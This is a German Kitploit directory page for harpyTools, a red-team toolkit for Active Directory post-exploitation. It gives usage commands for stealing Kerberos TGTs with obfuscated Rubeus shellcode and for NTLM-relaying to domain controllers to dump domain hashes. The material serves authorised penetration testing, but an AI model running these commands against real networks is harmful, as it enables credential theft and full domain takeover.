Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
harpyTools — Automatisiertes Post-Exploitation-Toolkit für Active Directory zur Extraktion von Kerberos-Tickets, NTLM-Relay-Angriffen und lateraler Bewegung via NetExec, Impacket und Donut-Integration. | Kitploit
Tools/GitHubGitHub/jssngc/harpytools
Privilege EscalationPayload-GenerierungExploitationLaterale BewegungShellcodePost-ExploitationPenetrationstestsCommand and ControlRed Teaming
GitHubjssngc/harpytools

harpyTools

Automatisiertes Post-Exploitation-Toolkit für Active Directory zur Extraktion von Kerberos-Tickets, NTLM-Relay-Angriffen und lateraler Bewegung via NetExec, Impacket und Donut-Integration.

192vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Active Directory Post-Exploitation und Relay-Automatisierungs-Tools

Dieses Repository enthält eine Sammlung von Python-Orchestrator-Skripten, die für Sicherheitsbewertungen und Penetrationstests in Active Directory-Umgebungen entwickelt wurden. Diese Tools sind speziell für Post-Exploitation-Szenarien ausgelegt, bei denen bereits lokaler Administratorzugriff auf einem kompromittierten Arbeitsplatz oder Server besteht und das Ziel die laterale Bewegung oder Privilegienerweiterung innerhalb der gesamten Active Directory-Domäne ist.

Durch die Automatisierung von Workflows, die gängige Sicherheitsutilities wie NetExec, Impacket, Donut und BloodyAD nutzen, vereinfachen diese Skripte komplexe mehrstufige Prozesse zu wiederholbaren Ein-Befehl-Operationen.

Voraussetzungen

Die Skripte erfordern, dass die folgenden Tools auf dem Hostsystem installiert und im System-PATH verfügbar sind:

  • Python 3.x
  • NetExec (nxc)
  • Impacket (impacket-ntlmrelayx, impacket-secretsdump, impacket-ticketConverter)
  • Donut (Shellcode-Generator)
  • Myph (Binary-Compiler/-Obfuskator)
  • BloodyAD (Active Directory-Verwaltungstool)
  • Standard-Linux-Utilities: awk, base64

Optionale Python-Abhängigkeiten

Für eine verbesserte Konsolenausgabe-Formatierung installieren Sie die folgenden Pakete:

root@kitploit:~
pip install colorama rich

Komponentenübersicht

1. TGT-Extraktions-Orchestrator (harpyTGT.py)

Dieses Skript automatisiert die Extraktion eines Kerberos Ticket Granting Ticket (TGT) aus einer angemeldeten Windows-Sitzung und konvertiert es in ein Linux-kompatibles ccache-Format.

  • Szenario: Sobald lokaler Administratorzugriff auf einem Rechner erlangt wurde, ermöglicht dieses Tool den Operatoren, die Kerberos-Tickets von Domänenbenutzern zu ernten, die auf diesem Host aktiv sind, und so laterale Bewegung ohne Kenntnis ihrer Klartext-Passwörter zu ermöglichen.
  • Mechanismus: Erzeugt ein Rubeus.exe-Shellcode-Payload über Donut, wendet Obfuskation mit Myph an und führt das resultierende Binary auf dem Zielhost entweder mittels geplanter Tasks (schtask_as) oder mmcexec aus.

Standard-Ausführung (Zielbenutzer hat administrative Rechte):

root@kitploit:~
./harpyTGT.py -t <ZIEL_IP> -u <LOKALER_ADMIN_BENUTZER> -p <LOKALES_ADMIN_PASSWORT> -U <ZIEL_BENUTZER> -r </pfad/zu/Rubeus.exe>

Alternative Ausführung (Zielbenutzer hat keine administrativen Rechte):

root@kitploit:~
./harpyTGT.py -t <ZIEL_IP> -u <LOKALER_ADMIN_BENUTZER> -p <LOKALES_ADMIN_PASSWORT> -U <ZIEL_BENUTZER> -r </pfad/zu/Rubeus.exe> --no-target-admin --attacker-ip <ANGREIFER_IP>

2. NTLM-Relay-Automatisierung (harpyRelay.py)

Dieses Skript koordiniert NTLM-Relay-Angriffe, die auf falsch konfigurierte SMB- oder LDAP-Signing-Richtlinien auf Domain-Controllern abzielen, um eine domänenweite Privilegienerweiterung zu erreichen oder einen NTDS-Datenbank-Dump (DCSync) durchzuführen.

  • Szenario: Unter Ausnutzung bestehender lokaler Administratorrechte auf einem kompromittierten Host zwingt das Skript einen Prozess mit hohen Privilegien (z. B. eine Domänen-Admin-Sitzung) dazu, sich beim Angreifer zu authentifizieren, und leitet diese Anmeldedaten an den Domain-Controller weiter, um die gesamte Domäne über LDAP/LDAPS zu kompromittieren.
  • Mechanismus: Startet einen ntlmrelayx-Listener, löst über NetExec eine Authentifizierungsanfrage vom kompromittierten Client aus, überwacht die Ausgabe auf erfolgreiche Ausnutzung und führt einen Dump der Domänen-Hashes durch. Das Tool enthält automatisierte Bereinigungsroutinen, um den Fußabdruck in der Zieldomäne zu minimieren.

LDAPS-Flow (Standard):

root@kitploit:~
./harpyRelay.py --target-host <CLIENT_IP> --local-user <LOKALER_ADMIN> --local-pass <LOKALES_PASSWORT> --domain-admin-user <DOMÄNEN_ADMIN> --attacker-ip <ANGREIFER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL>

LDAP-Flow (Alternativer Flow, wenn LDAPS nicht verfügbar ist):

root@kitploit:~
./harpyRelay.py --target-host <CLIENT_IP> --local-user <LOKALER_ADMIN> --local-pass <LOKALES_PASSWORT> --domain-admin-user <DOMÄNEN_ADMIN> --attacker-ip <ANGREIFER_IP> --dc-ip <DC_IP> --domain <DOMAIN.LOCAL> --no-ldaps

3. NetExec-Modul: stealTGT

Ein benutzerdefiniertes Modul für NetExec (nxc), das zur Extraktion des Kerberos Ticket Granting Ticket (TGT) eines bestimmten angemeldeten Benutzers auf dem Zielrechner entwickelt wurde.

Das Modul interagiert über mmcexec als SYSTEM, automatisiert die Erstellung eines ausweichenden Payloads (Kapselung von Rubeus mit Donut und Myph), führt es im Speicher aus, erfasst die Base64-Ausgabe des Tickets und konvertiert sie transparent in eine .ccache-Datei, die unter Linux verwendbar ist.

Voraussetzungen auf dem Angreifer-Host (Kali Linux)

Das Modul überprüft automatisch, ob die folgenden Utilities installiert und in Ihrem $PATH verfügbar sind:

  • donut
  • myph
  • impacket-ticketConverter

Modulinstallation

Um das externe Modul in NetExec zu laden, kopieren Sie das Skript stealTGT.py in Ihr lokales NetExec-Modulverzeichnis:

root@kitploit:~
cp stealTGT.py ~/.nxc/modules/

Verwendung und Syntax

root@kitploit:~
netexec smb <ZIEL_IP> -u <ADMIN_BENUTZER> -p <ADMIN_PASSWORT> --local-auth -M stealTGT -o USER=<ZIEL_BENUTZER> RUBEUS=/pfad/zu/Rubeus.exe

Moduloptionen (-o):

  • USER: Der Benutzername der aktuell angemeldeten Sitzung, aus der Sie das TGT ernten möchten (z. B. jdoe).
  • RUBEUS: Der lokale Pfad auf Ihrem Angreifer-Rechner, an dem sich die legitime Rubeus.exe-Binary befindet.

Betriebliche Funktionen

  • Automatisierte Umgebungsbereinigung: Das Relay-Utility verfolgt während der Ausführung erstellte temporäre Konten und versucht automatisch deren Entfernung über bloodyad oder netexec, sobald die Vorgänge abgeschlossen sind.
  • Umgang mit Nicht-TLS-Umgebungen: Enthält explizite Fallbacks für Umgebungen, in denen Domain-Controller LDAP über TLS (LDAPS) nicht unterstützen.

Haftungsausschluss

WICHTIGER HINWEIS: Dieses Repository ist ausschließlich für autorisierte Sicherheitsaudits, Sicherheitsforschung und Bildungszwecke bestimmt. Das Ausführen dieser Tools gegen Produktionsinfrastrukturen ohne vorherige ausdrückliche schriftliche Genehmigung der Systemeigentümer ist strengstens untersagt. Der Autor übernimmt keine Haftung für Missbrauch, Kollateralschäden oder rechtliche Konsequenzen, die aus dem Einsatz dieser Software resultieren.

Tool herunterladen